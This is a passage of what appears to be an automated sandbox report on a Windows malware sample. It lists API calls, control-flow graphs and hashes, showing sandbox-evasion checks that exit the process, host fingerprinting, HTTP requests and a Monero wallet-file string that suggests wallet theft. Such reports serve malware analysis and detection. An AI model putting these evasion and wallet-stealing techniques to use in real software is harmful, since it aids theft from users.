93a9b0 call 93a8a0 call 93a800 1073->1078 1074->1072 1078->1071
                  APIs
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                    • Part of subcall function 009247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00924839
                    • Part of subcall function 009247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00924849
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                  • InternetOpenA.WININET(00940DFE,00000001,00000000,00000000,00000000), ref: 009262E1
                  • StrCmpCA.SHLWAPI(?,0105E790), ref: 00926303
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00926335
                  • HttpOpenRequestA.WININET(00000000,GET,?,0105EAD0,00000000,00000000,00400100,00000000), ref: 00926385
                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009263BF
                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009263D1
                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 009263FD
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0092646D
                  • InternetCloseHandle.WININET(00000000), ref: 009264EF
                  • InternetCloseHandle.WININET(00000000), ref: 009264F9
                  • InternetCloseHandle.WININET(00000000), ref: 00926503
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                  • String ID: ERROR$ERROR$GET
                  • API String ID: 3749127164-2509457195
                  • Opcode ID: bd89955fdaac475cadebc48df33c487a637d54f6e407a8971d5fbe68020f32fb
                  • Instruction ID: 6f101d75e2b397e85bab288f262666e1ff9c2fe0625489cd3ba8f4cc62909582
                  • Opcode Fuzzy Hash: bd89955fdaac475cadebc48df33c487a637d54f6e407a8971d5fbe68020f32fb
                  • Instruction Fuzzy Hash: 6A712D71A00218ABDF24EFA0DC49FEEB778BB44700F108198F50A6B5D4DBB46A85CF52

                  Control-flow Graph
                  control_flow_graph 1090 935510-935577 call 935ad0 call 93a820 * 3 call 93a740 * 4 1106 93557c-935583 1090->1106 1107 9355d7-93564c call 93a740 * 2 call 921590 call 9352c0 call 93a8a0 call 93a800 call 93aad0 StrCmpCA 1106->1107 1108 935585-9355b6 call 93a820 call 93a7a0 call 921590 call 9351f0 1106->1108 1134 935693-9356a9 call 93aad0 StrCmpCA 1107->1134 1138 93564e-93568e call 93a7a0 call 921590 call 9351f0 call 93a8a0 call 93a800 1107->1138 1124 9355bb-9355d2 call 93a8a0 call 93a800 1108->1124 1124->1134 1139 9356af-9356b6 1134->1139 1140 9357dc-935844 call 93a8a0 call 93a820 * 2 call 921670 call 93a800 * 4 call 936560 call 921550 1134->1140 1138->1134 1144 9357da-93585f call 93aad0 StrCmpCA 1139->1144 1145 9356bc-9356c3 1139->1145 1270 935ac3-935ac6 1140->1270 1164 935991-9359f9 call 93a8a0 call 93a820 * 2 call 921670 call 93a800 * 4 call 936560 call 921550 1144->1164 1165 935865-93586c 1144->1165 1149 9356c5-935719 call 93a820 call 93a7a0 call 921590 call 9351f0 call 93a8a0 call 93a800 1145->1149 1150 93571e-935793 call 93a740 * 2 call 921590 call 9352c0 call 93a8a0 call 93a800 call 93aad0 StrCmpCA 1145->1150 1149->1144 1150->1144 1250 935795-9357d5 call 93a7a0 call 921590 call 9351f0 call 93a8a0 call 93a800 1150->1250 1164->1270 1171 935872-935879 1165->1171 1172 93598f-935a14 call 93aad0 StrCmpCA 1165->1172 1179 9358d3-935948 call 93a740 * 2 call 921590 call 9352c0 call 93a8a0 call 93a800 call 93aad0 StrCmpCA 1171->1179 1180 93587b-9358ce call 93a820 call 93a7a0 call 921590 call 9351f0 call 93a8a0 call 93a800 1171->1180 1201 935a16-935a21 Sleep 1172->1201 1202 935a28-935a91 call 93a8a0 call 93a820 * 2 call 921670 call 93a800 * 4 call 936560 call 921550 1172->1202 1179->1172 1275 93594a-93598a call 93a7a0 call 921590 call 9351f0 call 93a8a0 call 93a800 1179->1275 1180->1172 1201->1106 1202->1270 1250->1144 1275->1172
                  APIs
                    • Part of subcall function 0093A820: lstrlen.KERNEL32(00924F05,?,?,00924F05,00940DDE), ref: 0093A82B
                    • Part of subcall function 0093A820: lstrcpy.KERNEL32(00940DDE,00000000), ref: 0093A885
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00935644
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009356A1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00935857
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                    • Part of subcall function 009351F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00935228
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                    • Part of subcall function 009352C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00935318
                    • Part of subcall function 009352C0: lstrlen.KERNEL32(00000000), ref: 0093532F
                    • Part of subcall function 009352C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00935364
                    • Part of subcall function 009352C0: lstrlen.KERNEL32(00000000), ref: 00935383
                    • Part of subcall function 009352C0: lstrlen.KERNEL32(00000000), ref: 009353AE
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0093578B
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00935940
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00935A0C
                  • Sleep.KERNEL32(0000EA60), ref: 00935A1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen$Sleep
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 507064821-2791005934
                  • Opcode ID: 76610699a5a18742186431c6ea7e7c3677e038ad304ba8e1002c625b8010df00
                  • Instruction ID: 42e8ba15192b47e01c912cad2ccf943d16a1f0f7760a2ed9f8815f90c3d439ee
                  • Opcode Fuzzy Hash: 76610699a5a18742186431c6ea7e7c3677e038ad304ba8e1002c625b8010df00
                  • Instruction Fuzzy Hash: 3FE1FB72910104AACB14FBA0EC96FED7379AFD4300F508568F547A7195EF74AA09CFA2

                  Control-flow Graph
                  control_flow_graph 1301 9317a0-9317cd call 93aad0 StrCmpCA 1304 9317d7-9317f1 call 93aad0 1301->1304 1305 9317cf-9317d1 ExitProcess 1301->1305 1309 9317f4-9317f8 1304->1309 1310 9319c2-9319cd call 93a800 1309->1310 1311 9317fe-931811 1309->1311 1313 931817-93181a 1311->1313 1314 93199e-9319bd 1311->1314 1316 931913-931924 StrCmpCA 1313->1316 1317 931932-931943 StrCmpCA 1313->1317 1318 9318f1-931902 StrCmpCA 1313->1318 1319 931951-931962 StrCmpCA 1313->1319 1320 931970-931981 StrCmpCA 1313->1320 1321 931835-931844 call 93a820 1313->1321 1322 93187f-931890 StrCmpCA 1313->1322 1323 93185d-93186e StrCmpCA 1313->1323 1324 931821-931830 call 93a820 1313->1324 1325 931849-931858 call 93a820 1313->1325 1326 9318cf-9318e0 StrCmpCA 1313->1326 1327 93198f-931999 call 93a820 1313->1327 1328 9318ad-9318be StrCmpCA 1313->1328 1314->1309 1342 931930 1316->1342 1343 931926-931929 1316->1343 1344 931945-931948 1317->1344 1345 93194f 1317->1345 1340 931904-931907 1318->1340 1341 93190e 1318->1341 1346 931964-931967 1319->1346 1347 93196e 1319->1347 1349 931983-931986 1320->1349 1350 93198d 1320->1350 1321->1314 1334 931892-93189c 1322->1334 1335 93189e-9318a1 1322->1335 1332 931870-931873 1323->1332 1333 93187a 1323->1333 1324->1314 1325->1314 1338 9318e2-9318e5 1326->1338 1339 9318ec 1326->1339 1327->1314 1336 9318c0-9318c3 1328->1336 1337 9318ca 1328->1337 1332->1333 1333->1314 1354 9318a8 1334->1354 1335->1354 1336->1337 1337->1314 1338->1339 1339->1314 1340->1341 1341->1314 1342->1314 1343->1342 1344->1345 1345->1314 1346->1347 1347->1314 1349->1350 1350->1314 1354->1314
                  APIs
                  • StrCmpCA.SHLWAPI(00000000,block), ref: 009317C5
                  • ExitProcess.KERNEL32 ref: 009317D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID: block
                  • API String ID: 621844428-2199623458
                  • Opcode ID: 6353981a661574a4479c168a7552e2287329c377fc4eae075701501b6f78372a
                  • Instruction ID: 79e46995d28abd6120a0847a8d658c3c4a815943982e6a2b971a8ccaa15722fb
                  • Opcode Fuzzy Hash: 6353981a661574a4479c168a7552e2287329c377fc4eae075701501b6f78372a
                  • Instruction Fuzzy Hash: A3515AB4A14209EFCB04DFA4E994FBE77B9AF84304F108448E506A73A1D774A955CF62

                  Control-flow Graph

                  control_flow_graph 1356 937500-93754a GetWindowsDirectoryA 1357 937553-9375c7 GetVolumeInformationA call 938d00 * 3 1356->1357 1358 93754c 1356->1358 1365 9375d8-9375df 1357->1365 1358->1357 1366 9375e1-9375fa call 938d00 1365->1366 1367 9375fc-937617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 937619-937626 call 93a740 1367->1369 1370 937628-937658 wsprintfA call 93a740 1367->1370 1377 93767e-93768e 1369->1377 1370->1377
                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00937542
                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0093757F
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00937603
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0093760A
                  • wsprintfA.USER32 ref: 00937640
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                  • String ID: :$C$\
                  • API String ID: 1544550907-3809124531
                  • Opcode ID: 0b6b62d1f40d9c0ac702969726a8e1d06ec950a25f360ca41c225fed55924d13
                  • Instruction ID: e8a04ac7dd2942d874706694db54eff586b009d648213aa86ebce72fdc8d63e0
                  • Opcode Fuzzy Hash: 0b6b62d1f40d9c0ac702969726a8e1d06ec950a25f360ca41c225fed55924d13
                  • Instruction Fuzzy Hash: 2B417EB1D04248ABDF20DB94DC95BEEBBB8AB48704F100199F509672C0DB78AA44CFA5

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00939860: GetProcAddress.KERNEL32(76F70000,010541F8), ref: 009398A1
                    • Part of subcall function 00939860: GetProcAddress.KERNEL32(76F70000,01054228), ref: 009398BA
                    • Part of subcall function 00939860: GetProcAddress.KERNEL32(76F70000,01054258), ref: 009398D2
                    • Part of subcall function 00939860: GetProcAddress.KERNEL32(76F70000,01054150), ref: 009398EA
                    • Part of subcall function 00939860: GetProcAddress.KERNEL32(76F70000,010540D8), ref: 00939903
                    • Part of subcall function 00939860: GetProcAddress.KERNEL32(76F70000,01058E10), ref: 0093991B
                    • Part of subcall function 00939860: GetProcAddress.KERNEL32(76F70000,01046260), ref: 00939933
                    • Part of subcall function 00939860: GetProcAddress.KERNEL32(76F70000,010461E0), ref: 0093994C
                    • Part of subcall function 00939860: GetProcAddress.KERNEL32(76F70000,01054198), ref: 00939964
                    • Part of subcall function 00939860: GetProcAddress.KERNEL32(76F70000,010540C0), ref: 0093997C
                    • Part of subcall function 00939860: GetProcAddress.KERNEL32(76F70000,01054168), ref: 00939995
                    • Part of subcall function 00939860: GetProcAddress.KERNEL32(76F70000,01054180), ref: 009399AD
                    • Part of subcall function 00939860: GetProcAddress.KERNEL32(76F70000,01046360), ref: 009399C5
                    • Part of subcall function 00939860: GetProcAddress.KERNEL32(76F70000,010541B0), ref: 009399DE
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 009211D0: ExitProcess.KERNEL32 ref: 00921211
                    • Part of subcall function 00921160: GetSystemInfo.KERNEL32(?), ref: 0092116A
                    • Part of subcall function 00921160: ExitProcess.KERNEL32 ref: 0092117E
                    • Part of subcall function 00921110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0092112B
                    • Part of subcall function 00921110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00921132
                    • Part of subcall function 00921110: ExitProcess.KERNEL32 ref: 00921143
                    • Part of subcall function 00921220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0092123E
                    • Part of subcall function 00921220: __aulldiv.LIBCMT ref: 00921258
                    • Part of subcall function 00921220: __aulldiv.LIBCMT ref: 00921266
                    • Part of subcall function 00921220: ExitProcess.KERNEL32 ref: 00921294
                    • Part of subcall function 00936770: GetUserDefaultLangID.KERNEL32 ref: 00936774
                    • Part of subcall function 00921190: ExitProcess.KERNEL32 ref: 009211C6
                    • Part of subcall function 00937850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009211B7), ref: 00937880
                    • Part of subcall function 00937850: RtlAllocateHeap.NTDLL(00000000), ref: 00937887
                    • Part of subcall function 00937850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0093789F
                    • Part of subcall function 009378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00937910
                    • Part of subcall function 009378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00937917
                    • Part of subcall function 009378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0093792F
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01058DD0,?,0094110C,?,00000000,?,00941110,?,00000000,00940AEF), ref: 00936ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00936AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00936AF9
                  • Sleep.KERNEL32(00001770), ref: 00936B04
                  • CloseHandle.KERNEL32(?,00000000,?,01058DD0,?,0094110C,?,00000000,?,00941110,?,00000000,00940AEF), ref: 00936B1A
                  • ExitProcess.KERNEL32 ref: 00936B22
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                  • String ID:
                  • API String ID: 2525456742-0
                  • Opcode ID: 23d53686c421a099530d7605b2400d9eaad1fe3cef2b0cf4c4578b4596ff5d9a
                  • Instruction ID: b6b62bcc899827b610d373a46db5e5e54431e5814be17349b3397882e9da346a
                  • Opcode Fuzzy Hash: 23d53686c421a099530d7605b2400d9eaad1fe3cef2b0cf4c4578b4596ff5d9a
                  • Instruction Fuzzy Hash: 6F31EA71904218AADB04FBF0DC56BFEB778AF94740F104528F252B61D2DFB46A05CEA6

                  Control-flow Graph

                  control_flow_graph 1436 921220-921247 call 9389b0 GlobalMemoryStatusEx 1439 921273-92127a 1436->1439 1440 921249-921271 call 93da00 * 2 1436->1440 1442 921281-921285 1439->1442 1440->1442 1443 921287 1442->1443 1444 92129a-92129d 1442->1444 1446 921292-921294 ExitProcess 1443->1446 1447 921289-921290 1443->1447 1447->1444 1447->1446
                  APIs
                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0092123E
                  • __aulldiv.LIBCMT ref: 00921258
                  • __aulldiv.LIBCMT ref: 00921266
                  • ExitProcess.KERNEL32 ref: 00921294
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                  • String ID: @
                  • API String ID: 3404098578-2766056989
                  • Opcode ID: 2d48f73a616f3938f3ef741aaae2483ff9c7d969e1c900d047eea4ea5b767058
                  • Instruction ID: fb94158911af60d249a33222a9458c5277eab56b3bdf02719890630fcd7e796a
                  • Opcode Fuzzy Hash: 2d48f73a616f3938f3ef741aaae2483ff9c7d969e1c900d047eea4ea5b767058
                  • Instruction Fuzzy Hash: 65016DB0D44308FBEF10DBE0EC49BAEBB78AB54701F208048F705B62C4DBB855518B99

                  Control-flow Graph

                  control_flow_graph 1450 936af3 1451 936b0a 1450->1451 1453 936aba-936ad7 call 93aad0 OpenEventA 1451->1453 1454 936b0c-936b22 call 936920 call 935b10 CloseHandle ExitProcess 1451->1454 1460 936af5-936b04 CloseHandle Sleep 1453->1460 1461 936ad9-936af1 call 93aad0 CreateEventA 1453->1461 1460->1451 1461->1454
                  APIs
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01058DD0,?,0094110C,?,00000000,?,00941110,?,00000000,00940AEF), ref: 00936ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00936AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00936AF9
                  • Sleep.KERNEL32(00001770), ref: 00936B04
                  • CloseHandle.KERNEL32(?,00000000,?,01058DD0,?,0094110C,?,00000000,?,00941110,?,00000000,00940AEF), ref: 00936B1A
                  • ExitProcess.KERNEL32 ref: 00936B22
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                  • String ID:
                  • API String ID: 941982115-0
                  • Opcode ID: 6ad6ba146417ef1a82b4017f0b72f668193b5d26f2160cd91efb88704dc55b98
                  • Instruction ID: 3e4d4b5a08a8701ed34ffe7308417933103ebcf4a75ff3e387d4aad05d562b63
                  • Opcode Fuzzy Hash: 6ad6ba146417ef1a82b4017f0b72f668193b5d26f2160cd91efb88704dc55b98
                  • Instruction Fuzzy Hash: 35F03A30944209BAEB00ABA0DC16BBDBA74EB44701F108914F503E61C1CBF45940DE56

                  Control-flow Graph

                  APIs
